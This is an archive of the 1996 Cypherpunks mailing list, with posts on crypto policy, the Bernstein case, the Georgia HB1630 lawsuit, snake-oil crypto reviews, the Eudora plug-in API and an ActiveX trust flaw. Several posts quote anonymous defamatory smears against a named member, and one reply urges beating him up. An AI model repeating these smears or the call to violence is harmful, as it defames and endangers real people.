From: eric at sac.net (Eric Hughes)
Date: Tue, 24 Sep 1996 06:18:34 +0800
Subject: List participation
Message-ID: <2.2.32.19960923172509.00d6e4e4@flamingo.remailer.net>

I have been informed that Dr.Dimitri Vulis KOTM wrote:
> [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore,
> Rich Salz, and many other former valuable contributors off the
> mailing list [...]

As for me, I stopped having time to read cypherpunks a year and a half ago. Tim had nothing to do with it. The cypherpunks list has changed and I have changed; so be it.

Eric

From cbarnett at eciad.bc.ca Mon Sep 23 15:30:58 1996
From: cbarnett at eciad.bc.ca (Clint Barnett)
Date: Tue, 24 Sep 1996 06:30:58 +0800
Subject: crypto anarchy vs AP
In-Reply-To: <199609221810.TAA00172@server.test.net>
Message-ID:

>government power will just be gradually eroded as international
>businesses gain power, and borders become more open, trade more free, as
>travel becomes cheaper, and moving to another country becomes less of a
>hassle.

Okay, from the top: there are a number of reasons why this won't happen. One of the most obvious being that businesses are NOT in the business of helping people, they are in the business of making money. Trade will not become free, travel will not become cheaper, and if they are given the powers of a government they would not likely let its consumer base move to a country with a better dental plan, thus borders would not become more open. In fact, I can easily picture business leaders in the throes of ecstasy over the prospect of having 260 million people who have no choice but to buy their product because there are no other manufacturers.

Another reason is that government is like a giant bumblebee, not too bright, but if you keep poking at it with a sharp stick it will sting you.
Government officials are interested in keeping their cushy jobs and expensive hookers, if they start to feel threatened by crypto anarchy, who do you think they're going to retaliate against? The guy who runs the blockbuster video on the corner? >to create the appearance of as free a life style as they can for >individuals ever read "1984"? the appearance of a free lifestyle is most definitely not a free lifestyle. I am hardly a friend of the state, and far from being an advocate of the church, but multinational corporations running the world for their own fun and profit makes my sphincter clench. clint barnett emily carr institute From stewarts at ix.netcom.com Mon Sep 23 15:37:42 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 24 Sep 1996 06:37:42 +0800 Subject: Bernstein Case in "The Recorder", SF Law newspaper Message-ID: <199609231817.OAA16098@attrh1.attrh.att.com> I didn't have 4 quarters handy to feed the newspaper machine, but "The Recorder", a San Francisco law newspaper, has a headline today about "Feds On The Ropes In Export Law Suit", about the Bernstein case. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From vznuri at netcom.com Mon Sep 23 15:42:01 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Tue, 24 Sep 1996 06:42:01 +0800 Subject: possible solution to cyber S/N Message-ID: <199609231847.LAA29832@netcom5.netcom.com> I've written many times on the problem of signal to noise here in cyberspace and have tried to think through some elegant solutions to this very vexing problem. moments ago I just came up with an intense brainstorm fully worthy of sharing with the list . it's clear that the web functions very much like a directed graph in many ways. sites and traffic between them are one graph. 
however, another graph involves thinking of each page or "article" on the web as a single node in the graph, and hyperlinks as the edges between the nodes. what we have today is a directed graph in which one can follow the forward direction of hyperlinks very readily. however, it is much more difficult to follow the reverse direction, i.e. find "all the sites that reference this paper". of course this is part of the beauty of the web, that anyone can link to anyone without actually having to register or something like that. the "referrer log" feature on a server is a mechanism that does allow a server to get some idea of who is linked up to that site. the basic idea I have is that references are an excellent way of discriminating Signal to Noise and are used routinely in the scientific arena. a paper that is pivotal and influential is referred to ad infinitum. obscure papers are forgotten and never referred to in subsequent literature. taking this idea to the cyberspace arena, the application is immediately obvious-- pages that are linked to by a lot of other pages are valuable, those that are not are not as valuable. (another closely related idea is how much hit traffic a web site gets-- wouldn't it be a *tremendous* improvement in the current search engines if they returned the pages ranked according to how many hits they get per time?) there are some problems with all the above, however. currently only the site that actually houses the pages can keep track of hits, and referrers are not very well kept track of at all. in a robust system, cheating, such as reporting more hits than one is getting, would not be possible. anyway, I tend to think that future S/N problems in cyberspace are increasingly going to be solved in some particular ways that are just now being tried out: 1. rating agencies. agencies that both reject and find "cool stuff" (like Point Communications etc.) 2. hit statistics. how many people are hitting various pages? 
if we could get an arbitron-like system that works the same way that newsgroup readerships are now reported (each site compiles statistics and sends them to centralized databases) we could have search engines that rank results according to hit statistics. I'm not saying it would be perfect, and there are all kinds of obvious nitpicky things that people here will harp on, but I still insist it would be better than no statistics at all. eventually a system like this that involved voluntary submissions of hit counts to the centralized servers (or just some way of search engines to get hit statistics from servers about the pages they own/serve) may evolve into a more robust system that makes cheating impossible (such as falsely reporting a high hit count to attract people to the site). 3. linking statistics. again, I think this is an extremely powerful way of separating signal from noise-- how many other sites are linked to the page in question? if it has few links, it isn't as interesting, if a lot of other people point to it, it's far more interesting. I encourage system designers to keep some of these ideas in mind when they are working on the current generation of software tools such as search engines etc. in particular there is a tremendous amount of innovation going on right now between search engine designers, and adopting some of the above ideas into a search engine might be a very powerful way of distinguishing it from the "competition" by returning more useable search results to the end user. again, I suspect we will be seeing increasingly ingenious and efficacious ways of dealing with what today is the horrible S/N problem. 
perhaps today will be thought of as the dark age of cyberspace because of all the muck we are routinely wading through From cbarnett at eciad.bc.ca Mon Sep 23 15:42:16 1996 From: cbarnett at eciad.bc.ca (Clint Barnett) Date: Tue, 24 Sep 1996 06:42:16 +0800 Subject: A daily word of caution in reference Tim C[unt] May In-Reply-To: <199609230540.BAA16639@godzilla.athensnet.com> Message-ID: is this kind of crap really necessary? Are you that bored? If you have a problem, go to his house and beat him up. As for you Tim C. May, call your friends and wait in the bushes for this asshole to show up at your house. Maybe the rest of them will get the hint that this waste of time is deeply unappreciated. clint barnett lord of the cosmos emily carr institute On Mon, 23 Sep 1996, Dustbin Freedom Remailer wrote: > Tim C[unt] May is not only as queer as a three dollar bill, but he is also into > having sex with children. > From ddt at lsd.com Mon Sep 23 15:46:13 1996 From: ddt at lsd.com (Dave Del Torto) Date: Tue, 24 Sep 1996 06:46:13 +0800 Subject: Eudora 3 EMS API stuff Message-ID: Anyone interested in creating plug-ins for Eudora 3.x that provide encryption/remailer/etc support needs this information. dave ................................. cut here ................................. ABOUT THE API The EMS API is one of several complimentary facilities available for integrating 3rd party applications and services with Eudora email. "Plug-ins" interface with Eudora via the EMS API. For Windows the plug-ins are DLL's and on the Macintosh they are Components. Abstractly speaking, the EMS API is most suited for performing transformations, conversions and some other forms of processing on email messages as they are sent and received by Eudora. In practice it is very useful for encryption, digital signatures, and compression. These are all processes that involve encapsulating a message attachments and all. The EMS API is also very useful for text processing and conversions. 
These might include simple formatting and sorting utilities, or human language translation, and some forms of text-based encryption. EMS API plug-ins can be used to do data format conversions on things ranging from graphic images in attachments to international character sets. Another interesting category are plug-ins that process messages in some way, but don't necessarily change them. For example, a plug-in could be set up so that it scans certain messages for updates to a database like a catalog and automatically makes the change in the local database. Another could be used to scan incoming message attachments for viruses. In a sense, plug-ins can function as filters. DOCUMENTS AND SDK As of the end of July we have documentation and support available at as follows: emsapi1.pdf - Adobe Acrobat document describing API version 1 (current on Mac) emsapi2.pdf - Acrobat document describing the API version 2 (current for Windows) chngs2.pdf - Acrobat document showing changes between version 1 & 2 EMS-API-SDK-1.0b3.hqx - Macintosh developer's kit ems1b2.zip - The Windows software developer's kit The developers kit includes a number of support utilities and source code for four sample plug-ins. CURRENT STATUS As of the end of August, Macintosh Eudora Pro 3.0 is shipping and supports the EMS API version 1. The current Macintosh Eudora Lite (the free version) does not support the EMS API, but it will and a beta version is expected in early September if not sooner. Version 1.0b3 of the SDK for the Macintosh is currently available from our FTP site. Windows Eudora 3.0 is in beta test right now and supports EMS API version 2. A copy can be obtained from our ftp site. Version 1.0b2 (a public beta release) of SDK for the API is also now available from our ftp site. MAILING LIST AND MORE INFORMATION If you have specific questions about the API you can write to . If you'd like to keep up to date on the API you can join a mailing list we have for announcements and discussions. 
To join, send a message to . This mailing list is manually administered and is not a listserv, majordomo or listproc, so no special formatting is needed in the request message. From rah at shipwright.com Mon Sep 23 15:53:09 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 24 Sep 1996 06:53:09 +0800 Subject: BAA, BAA, SAY THE SHEEPLE Message-ID: --- begin forwarded text Mime-Version: 1.0 Date: Mon, 23 Sep 1996 08:24:36 -0700 To: , rah at shipwright.com From: Subject: BAA, BAA, SAY THE SHEEPLE COLORADO SENATOR CHARLES DUKE ON THE LOSS OF LIBERTY By Senator Charles R. Duke, September 16, 1996 Colorado District 9, (719) 481-9289 BAA, BAA, SAY THE SHEEPLE Who would have thought America would be where it is today? Earlier in the week, news stories appeared announcing that a proposal to do background checks on regular passengers came from a commission studying terrorism. This, of course, would do absolutely nothing to stop terrorism. Any decent terrorist knows enough to not travel under a real name. In any case, most airline terrorist incidents will likely be caused by someone who doesn't fly on the same plane for which the incident is planned. Since these ideas are patently obvious to the most casual observers, what, then, is the purpose of this tyranny? Is it simply to get the American sheeple so accustomed to government spying that we don't mind? To do this would require some sort of identification number and what better number to use than the Social Security number? Having the SSN flying around all these databases would also allow those who have access to such numbers to examine our bank records and credit history, along with many other records. Oh, nuts, I say. This proposal is just too depressing. So I pick up the Wall Street Journal for Friday the Thirteenth of September. Might as well read a little financial news to get in a better mood. I mean, our economy is really doing okay, or at least so the government would have us believe. 
I never got to the stock tables. There, on the front page, is a story from San Mateo, California, where den mothers, coaches, and other volunteers who work with children will now be subjected to fingerprinting and background checks. The idea, you see, is to keep our children safe from child abuse. Don't look now, Toto, but this doesn't feel like Kansas, anymore. This will be totally ineffective at curbing child abuse, but you probably already knew that. This writer knows something about child abuse and can assure everyone that the overwhelming majority of child molesters become neither den mothers nor coaches. We have a Fourth Amendment to our U.S. Constitution that flatly prohibits these unreasonable searches and seizures. Specifically, the Amendment states, "The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched and the persons or things to be seized." It means that our private effects and our private lives are none of any civil authority's business, unless they have probable cause, and can obtain a warrant, sworn to by an oath or affirmation before a judge. The only way any nosy government gets away with this open and flagrant violation of constitutional rights is if the sheeple allow it. Where is the hue and cry from everyone about these measures? Have we become so conditioned to prying eyes that we have forgotten what privacy is about? Why are you, who have the courage to read this column, just standing idly by and letting our God-given rights be stripped from us on a daily basis? Where are the letters to the editor and civil demonstrations about this blatant tyranny? Our forefathers paid for these rights with their lives and their blood. 
They must be churning in their graves with the lackadaisical attitude we have today about our Constitution. They fought a War for Independence because King George was allowing warrantless searches and incarcerations. It was considered by our Founding Fathers to be a sacrilegious violation of rights granted to us by our Creator and not subject to the rule of Man. Somehow, in 1996, we have been lulled into complacency and apathy by a government totally dedicated to the absolute subjugation of our free will. Most of us have never really been free. We have been enslaved so long it is not clear we would know how to behave if by some process we had our real freedom restored. It is possible the American people actually deserve what is about to happen to us. We deserve it because of our collective inaction, our collective morals, our collective set of values, and our collective embrace of a failed political process. There are many examples in history where societies created and led by moral and just people have lasted for long periods. Almost without exception, the collapse of these societies were preceded by a loss of character in the people governed. Where would you put America today? --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From wendigo at pobox.com Mon Sep 23 15:55:26 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Tue, 24 Sep 1996 06:55:26 +0800 Subject: Snake-Oil FAQ In-Reply-To: Message-ID: <199609231616.MAA01276@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- An entity claiming to be Lance Cottrell wrote: : : >I think a blacklist of that sort is inherently bad. I would much rather : >have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than : >just be spoon fed a list of good products vs. bad products. 
Pardon the : >cliche, but if you give a man a fish ... etc, etc. : > : >mark : > : : I agree in principle, but for the foreseeable future I think the list will : be a "good thing". : As long as the descriptions of the products are comprehensive. Concern about legal issues has been expressed from the beginning. But, I don't think that libel/slander laws will be a stumbling block, as long as the publication is similar in nature to "Consumer Reports" or somesuch. : "Love is a snowmobile racing across the tundra. Suddenly : it flips over, pinning you underneath. At night the ice : weasels come." : --Nietzsche Matt Groening? mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From tcmay at got.net Mon Sep 23 16:19:20 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 07:19:20 +0800 Subject: Snake Oil Lists, Blacklists, and Anonymity Message-ID: At 4:16 PM 9/23/96, Mark Rogaski wrote: >An entity claiming to be Lance Cottrell wrote: >: I agree in principle, but for the foreseeable future I think the list will >: be a "good thing". >: > >As long as the descriptions of the products are comprehensive. Concern >about legal issues has been expressed from the beginning.
But, I don't >think that libel/slander laws will be a stumbling block, as long as >the publication is similar in nature to "Consumer Reports" or somesuch. I have to agree with Lance that the "ratings list" is more important and more useful than the "FAQ." (My comments about the "Snake Oil FAQ" were directed towards the _educational_ aspects of the FAQ, which I believe are covering territory already well-covered by good books and existing FAQs. A list of thumbs ups and thumbs downs, dynamically changing, is another matter--it is _not_ something covered in published books, due to the time factor, and would be a contribution.) However, bear in mind that such a list of products could involve legal battles. The mention of "Consumer Reports" is apropos of this. CR has been sued many times, and has a staff of lawyers both reviewing all articles they post for any hint of litigatable (?) reviews, and for dealing with the corporate lawyers of companies whose products did not fare well in the CR reviews. (Recall certain high-profile cases such as the sport utility vehicle "roll-over" tests.) Also, one of the audio magazines (or possibly even CR itself...my memory has faded) was sued in the 1970s by Bose Corporation for an unflattering review of Bose's flagship loudspeakers, the Bose 901s. The magazine basically said Bose's "direct-reflecting" multipattern array of small cones was "snake oil." (I don't know if the mag used this term, but this is what they said. And "snake oil" is a term used a _lot_ in the audio community, where snake oil salesmen sell things like the "Tice Clock," an ordinary LED clock ($7 at Radio Shack) which has been "cryogenically processed" and which, Tice claims, when plugged in to any wall outlet in the listening room will improve the soundstage, improve the sound by interpolating bits into the harsh digital stream, blah blah blah. Of course, Tice charges $200 for their special snake oil clock.) Back to the list of products. 
It would be best to handle it through an anonymous remailer...what others do with it, in terms of reposting it to public newsgroups (where Deja News, Yahoo, Alta Vista, etc. could find it), is their business. Reviews should be digitally-signed, probably by pseudonyms. The "anonymous reviewers" would actually be pseudonymous, and reputations would develop over time. (TANSTAAFL) The BlackNet model (message pools) could be used to get responses (letters to the editor?) back from customers, so that one might see messages like: "My company bought 5 copies of the SnakeTronics ScrambleMatic product, and found the key is stored in plaintext in the scramble.config file! Needless to say, we have stopped using ScrambleMatic and have asked SnakeTronics for our money back! signed, DisgruntledUser." (In other words, a formal rating or evaluation, perhaps from A to F, or 10 to -10, etc., could be supplemented with "blurbs," both positive and negative, from users.) The reason I recommend anonymous remailer distribution, and pseudonyms, is because of the litigation issue. Even if reviewers are not sued often, the threat of a suit influences reviews, which is why most reviews in most mags are puff pieces (glowing reviews, often strongly correlated with who is advertising in the mag). One can imagine Matt Blaze, for example, choosing to say _nothing_ about SnakeTronics' ScrambleMatic, for fear (justified) that he might get letters from their lawyers, thus taking up his time and even eventually landing him in court. Also, this sort of "blacklist" paves the way for similar anonymously-situated blacklists of doctors, lawyers, etc., and you can bet your last dollar that a list of "bad doctors" would be aggressively pursued in the courts of all major countries! Hence the use of remailers and BlackNet-style message pools will be paramount for such things. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. 
---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From wendigo at pobox.com Mon Sep 23 16:28:26 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Tue, 24 Sep 1996 07:28:26 +0800 Subject: Snake-Oil FAQ In-Reply-To: Message-ID: <199609231634.MAA02010@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- An entity claiming to be Timothy C. May wrote: : : The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most : in need of it won't read it. : : If those who post descriptions of their "Unbreakable Virtual Whammo-Matic : Really Complicated Transposition Cipher" have not bothered to read Schneier : or other basic texts on ciphers, why would they bother to read a Snake Oil : FAQ? This applies to their customers as well. I disagree, I think AC is a pretty scary book for the kind of people who need the Snake-Oil FAQ. I think the primary target audiences are IS professionals who are considering integrating crypto into their data communications and end users who want to send encrypted mail. Neither of these groups is going to embrace crypto if you toss them a tome like AC. And what is the primary goal here, if not to promote widespread use of crypto and educate about what makes good crypto good. We have to approach the non-believers on their own ground ;) mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. 
| APL-CPIO

From mccoy at communities.com Mon Sep 23 17:30:50 1996
From: mccoy at communities.com (Jim McCoy)
Date: Tue, 24 Sep 1996 08:30:50 +0800
Subject: provably hard PK cryptosystems
In-Reply-To:
Message-ID:

Asgaard writes:
>On Sun, 22 Sep 1996, Timothy C. May wrote:
>> Suppose a tile is placed at some place on the grid, and another tile
>> (possibly a different tile, possibly the same type of tile) is placed some
>> distance away on the grid. The problem is this: Can a "domino snake" be
>> found which reaches from the first tile to the second tile, with the
>> constraint that edges must match up on all tiles? (And all tiles must be in
>> normal grid locations, of course)
>
>Intuitively (but very well not, I'm not informed enough to know)
>this might be a suitable problem for Hellman's DNA computer, the
>one used for chaining the shortest route including a defined
>number of cities?

Solving such a problem is easy to break down into parallel steps, but the advantage of using the infinite plane (or even a plane with "really large" boundaries) which Tim mentioned is that you can make the search space larger than anything which can possibly be solved in a reasonable amount of time by these methods. For example, factoring composites of very large primes can also be done by such massively parallel systems, but the individual parts are no faster (actually they are almost always slower) than regular computing elements. Given a large enough search space even a parallel system runs out of processing elements.
jim

From camcc at abraxis.com Mon Sep 23 18:11:24 1996
From: camcc at abraxis.com (camcc at abraxis.com)
Date: Tue, 24 Sep 1996 09:11:24 +0800
Subject: Live Cybercast of GA lawsuit press conference
Message-ID: <2.2.32.19960923194304.006aacb0@smtp1.abraxis.com>

>X-Sender: rcostner at intergate.net
>Date: Mon, 23 Sep 1996 11:48:46 -0400
>To: efg-action at ninja.techwood.org
>Reply-To: efg-action at ninja.techwood.org
>
>Live Cybercast of HB1630 lawsuit press conference
>
>The ACLU, Electronic Frontiers Georgia, Mitchell Kaye (Georgia State
>Representative), and others will hold a press conference on their lawsuit
>against the State of Georgia, concerning HB1630, which is now law. The joint
>press conference will be broadcast live on the internet at 10:30 am on Tuesday
>September 24, 1996. To listen to the press conference, see
>
> http://www.efga.org/realaudio/hb1630.htm
>
>A note about EFGA: Electronic Frontiers Georgia has a new website
>. We are now referring to ourselves as EFGA, rather
>than EFG. Please update your websites accordingly.
>
> -- Robert Costner (770) 512-8746
> Electronic Frontiers Georgia
> rcostner at intergate.net
> http://www.efga.org/

From frissell at panix.com Mon Sep 23 18:38:27 1996
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 24 Sep 1996 09:38:27 +0800
Subject: TAG_ent
Message-ID: <3.0b19.32.19960923154738.009fceb0@panix.com>

> security issues are solved, he said. "The Internet is
> fundamentally flawed in that regard right now," Reed
> said. "At this moment in time at least, we at Citicorp
> would feel very uncomfortable accommodating any
> transactions on the Internet," he said.

But then they thought Plus and Cirrus were bad ideas as well.
DCF

From trei at process.com Mon Sep 23 19:03:35 1996
From: trei at process.com (Peter Trei)
Date: Tue, 24 Sep 1996 10:03:35 +0800
Subject: Another security problem reported in Microsoft's Internet Explor
Message-ID: <199609232003.NAA24214@toad.com>

(This is posted to both www-security and cypherpunks. Please be careful where you send responses).

See: http://www.news.com/News/Item/0,4,3707,00.html at C|net's news site for the whole story.

Short version: InfoSpace has released a program as an IE plugin, which, once the user has agreed to install it, registers InfoSpace as a 'trusted publisher' in Explorer. This apparently means that later requests to download Infospace programs would not trigger the dialog boxes requesting permission to download. InfoSpace describes this as a bug, and is releasing a corrected version.

Commentary: I hope that all IE plugin (ActiveX, script, whatever) publishers are as responsive. Ideally, I suppose, a downloaded executable component should not be able to silently manipulate the security policies of the system it arrives on, but it's hard to see how to prevent this in Microsoft's active content model. The Java model is more robustly protected against this problem, but as a result is not as capable.

The scary thing is that a clever author of Trojan horses could write an ActiveX control which does nothing but open the gates, and let other programs in without the Authenticode check. It could even let in another version of itself, which is also properly signed, but has no malicious code. Thus, it could cover its tracks.

Peter Trei
trei at process.com

Disclaimer: I do not represent my employer.

From laverty at matrixNet.com Mon Sep 23 19:09:39 1996
From: laverty at matrixNet.com (laverty at matrixNet.com)
Date: Tue, 24 Sep 1996 10:09:39 +0800
Subject: A daily warning regarding Tim ... [edited]
Message-ID: <2.2.32.19960923202301.009551fc@sunrise.matrixnet.com>

Eudora Pro 2.2 will also filter out all of the crap...
At 08:24 AM 9/23/96 -0500, you wrote: >>On Fri, 20 Sep 1996, John Anonymous MacDonald wrote: >> >>> Tim C[*] * studied yoga back-streching exercises for >>> five years so he could * * (*). >> >>Likely the NSA has nothing better to do these days. They got bored with >>just listening, so now they're spamming. Can we lock this fucker out of >>the list? Sure, he'll probably pick another nym to post from... >> > > >Can't lock him out of the list, but you can either set up a kill file, or find >something like the 3.0b version of Eudora, which has filters; you can set it up >where, if an incoming message has a certain From: string, it is transferred >directly into the Trash mail folder, which is, as a rule, cleaned up before >quitting. > >Daniel. > >-- >If in fact we are the only intelligent life on this planet, why the fuck are >we in this goddamn mess? >-- >Find my public key on the World Wide Web -- point your browser at: >http://bs.mit.edu:8001/pks-toplev.html > > > > From haggis at brutus.bright.net Mon Sep 23 19:24:54 1996 From: haggis at brutus.bright.net (Hamish) Date: Tue, 24 Sep 1996 10:24:54 +0800 Subject: Taking crypto out of the U.S. Message-ID: Soon I am going to be going overseas to Japan, and I want to take my notebook with me so I can keep up with everything, however, I have encrypted my hard drive and usually encrypt my mail. Is this in violation of the ITAR to keep everything the same when I go over? From somebody at tempest.ashd.com Mon Sep 23 19:28:53 1996 From: somebody at tempest.ashd.com (somebody at tempest.ashd.com) Date: Tue, 24 Sep 1996 10:28:53 +0800 Subject: Snooping ISP admin?? In-Reply-To: <32468D68.5E2@hooked.net> Message-ID: On Mon, 23 Sep 1996, Michael E. Carboy wrote: > Greetings All, > > Question for the group: I have encountered a situation that causes me > to believe an ISP is snoopingthrough encrytped mail. It seems that > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. 
I have
> encountered "POP3 account in use by another user" several times in the
> past few days and I am the only user... wondering if that "in use"
> message is the result of a clumsy sysadmin being caught with his hand
> in the cookie jar. Any thoughts from the group??? If those more
> knowledgeable than I deem these NOISE... my sincere apologies.

All I got to say is that if an admin wanted to get your mail, using POP3 would be the last thing one would try. Since the admin reigns over the machine he could just copy your mail file and do what he wishes at this point. Besides most admins including myself really want to bother talking to users most of the time let alone read their mail.

Carlos

From camcc at abraxis.com Mon Sep 23 19:34:33 1996
From: camcc at abraxis.com (camcc at abraxis.com)
Date: Tue, 24 Sep 1996 10:34:33 +0800
Subject: GA HB1630 Lawsuit: Press Advisory
Message-ID: <2.2.32.19960923194301.0069bebc@smtp1.abraxis.com>

>X-Sender: rcostner at intergate.net
>Reply-To: efg-action at ninja.techwood.org
>
>Joint Media Advisory:
>
>AMERICAN CIVIL LIBERTIES UNION
>ELECTRONIC FRONTIERS GEORGIA
>REP. MITCHELL KAYE
>
>Groups to Mount Legal Challenge to Georgia Cyberspace Law
>
>FOR IMMEDIATE RELEASE Contact: See list below
>Friday, September 20, 1996
>
> ATLANTA, GA-- -The American Civil Liberties Union, Electronic Frontiers
>Georgia, Georgia State Representative Mitchell Kaye (R-Marietta) and others
>will be holding a news conference on Tuesday, September 24 at 10:30 a.m.,
>immediately after filing a lawsuit seeking a preliminary injunction against a
>Georgia law barring communications in cyberspace.
>
> The suit names Governor Zell Miller and Attorney General Michael Bowers as
>defendants, and will be filed on behalf of 13 plaintiffs.
>------------------------------------------------------------------------------ >-------------------------------------- > > WHO: > >Attorneys Ann Beeson (ACLU) and Scott McClain (Bondurant, Mixson & Elmore) > >Plaintiffs Robert Costner (executive director, Electronic Frontiers Georgia); >Jeff Graham (AIDS Survival Project); Rep. Mitchell Kaye (GA House of >Representatives); Bonnie Nadri (The Page Factory); Teresa Nelson (ACLU of >Georgia); Eric Van Pelt (Atlanta Veterans Alliance); Josh Riley (individual >plaintiff); and Kimberly LyleWilson (Atlanta Freethought Society). > > WHAT: > >News conference to announce filing of legal challenge to Georgia >cyberspace law. > > WHEN: > >Tuesday, September 24, 10:30 a.m. > > WHERE: > >ACLU of Georgia >142 Mitchell Street SW (at Peachtree), Suite 301, Atlanta >(404) 523-6201 > >Note: Copies of the brief and plaintiff affidavits will be available at the >news conference and online at the EFGA website, and >through the ACLU's website and America Online site >(keyword: ACLU). > >Contacts: Teresa Nelson, ACLU GA Ann Beeson, national ACLU: 404-523-6201 > Robert Costner, EFGA: 770-512-8746 > Rep. Mitchell Kaye: 770-998-2399 > Scott McClain: 404-881-4138 > Emily Whitfield, ACLU Nat'l Press Office: 212-944-9800 x426 > > > From hallam at vesuvius.ai.mit.edu Mon Sep 23 19:39:05 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Tue, 24 Sep 1996 10:39:05 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609230102.SAA01161@mail.pacifier.com> Message-ID: <9609232148.AA17056@vesuvius.ai.mit.edu> So Jim Bell is opposed to "truly random attacks on ordinary citizens" Its this type ofappoligia for terrorism that disgusts me utterly. He is calling for murder but wants to dress it up in whatever psychotic justifications he can. He is also completely wrong. When the IRA attemoted to assasinate my cousin I was in no way intimidated and neither was he. 
He continued as a senior poitician for over a decade despite continued danger. I can think of no less effective method of bringing about change in attitudes. I am in no way intimidated by Bell either. He is a kook and I don;t think it he is worth further consideration. Phill From runnerfx at octet.com Mon Sep 23 19:39:21 1996 From: runnerfx at octet.com (Wearen Life) Date: Tue, 24 Sep 1996 10:39:21 +0800 Subject: Go away CIA In-Reply-To: <199609232104.RAA29874@ginger.capitalnet.com> Message-ID: Must we go thru this again? On Mon, 23 Sep 1996, Wayne H. Allen wrote: > At 08:45 AM 9/23/96 -0400, Wearen Life wrote: > >The CIA has many powers both great and small. If the can cover up findings > >of UFO's > > > > Has this list sunk that low? > Wayne H.Allen > whallen at capitalnet.com > Pgp key at www.capitalnet.com/~whallen > > From die at pig.die.com Mon Sep 23 19:42:05 1996 From: die at pig.die.com (Dave Emery) Date: Tue, 24 Sep 1996 10:42:05 +0800 Subject: Crypto Files in the BA Archives (fwd) Message-ID: <9609232028.AA23926@pig.die.com> Forwarded message: >From boatanchors at theporch.com Mon Sep 23 14:15:39 1996 Date: Mon, 23 Sep 1996 12:54:28 -0500 (CDT) Message-Id: Errors-To: listown at jackatak.theporch.com Reply-To: jproc at worldlinx.com Originator: boatanchors at theporch.com Sender: boatanchors at theporch.com Precedence: bulk From: jproc at worldlinx.com To: Multiple recipients of list Subject: Crypto Files in the BA Archives X-Listprocessor-Version: 6.0c -- ListProcessor by Anastasios Kotsikonas X-Comment: Amateur Radio Equipment Using Vacuum Tubes Content-Type: TEXT/PLAIN; charset=US-ASCII Mime-Version: 1.0 X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Dear BA'ers, For those of you in the group who are interested in crypto gear, I have posted two files to the BA archives which discuss the KL7 off line crypto unit and the KWR-37 online crypto receiver. 
To obtain the files, send a message to: listprocessor at theporch.com In the body of the message type: get boatanchors kl7.crypto.unit get boatanchors kwr37.crypto.receiver The second article is the one which will be submitted to AWA Old Timers Bulletin. BA'ers get to read it first. Regards, ------------------------------------- Jerry Proc VE3FAB E-mail: jproc at worldlinx.com HMCS Haida Naval Museum Toronto, Ontario 'Looking for a 'AN/SRC-501' ------------------------------------- From wombat at mcfeely.bsfs.org Mon Sep 23 19:42:17 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 10:42:17 +0800 Subject: The periodic word of advice about Timmy C. Maypole, the pathological liar In-Reply-To: <199609231805.UAA28245@basement.replay.com> Message-ID: On Mon, 23 Sep 1996, Anonymous wrote: > as the Russian sailor was the one who satisfied her the > most. ^^^^^^^ Ah, now we're getting somewhere ... From nobody at replay.com Mon Sep 23 19:43:32 1996 From: nobody at replay.com (Anonymous) Date: Tue, 24 Sep 1996 10:43:32 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609231808.MAA09908@InfoWest.COM> Message-ID: <199609232306.BAA27840@basement.replay.com> attila wrote: > = .Clearly, speech that makes someone uncomfortable must be banned by > = .the government. > > = .-Declan > > is that what you really meant? pretty liberal is it not? [silliness deleted out of mercy] One widely noted benefit of political repression is that people develop a very nuanced sense of language - irony, for example. From shamrock at netcom.com Mon Sep 23 19:43:35 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 24 Sep 1996 10:43:35 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Timothy C. May wrote: > Whoops! I didn't mean to intersect with "workplace" issues--I mean simple, > pure, nonworkplace-related speech. 
